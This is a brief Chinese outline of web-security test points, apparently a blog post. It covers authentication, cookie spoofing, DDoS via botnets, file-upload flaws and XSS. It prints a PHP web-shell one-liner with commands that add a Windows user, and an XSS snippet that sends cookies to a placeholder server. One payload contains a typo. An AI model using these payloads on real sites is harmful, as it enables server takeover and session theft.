从4方面考虑
1.认证与授权
1.1认证
1.2权限
1.3避免未经授权的页面可以直接访问
2.session与cookie
通过抓包工具或者F12查看
2.1session与cookie欺骗
2.2防止作用域为根目录
3.ddos拒绝服务攻击
意思就是疯狂地向服务器发送请求,导致服务器崩溃
3.1使用肉鸡
3.2攻击联盟
4.文件上传漏洞
4.1比如:创建一个后缀为.PHP的文件,代码为 <?php phpinfo( );?> 若有漏洞,会将服务器的情况展现出来
4.2 在输入框输入 <?php system($_GET['cmd']);?> 保存成功后刷洗页面,在URL地址后面输入?cmd=dir ; dir a; net user hello/add; net user hello/delet;
5.XSS跨站攻击
cross site script ,即往web页面插入恶意HTML代码,当用户浏览该页时,嵌入其中的代码被执行,
以下是进行跨站攻击使用的一些脚本
<input type="button" value="点我" onclick="alert('你好')" />
<input type="button" value="点我" onclick="alert(document.cookie)" /> 此时的cookie读取了但未保存
<input type="button" value="点我" onclick="location.href='http://服务器地址/cookie.php?cookie='+docunment.cookie"/ >
网友评论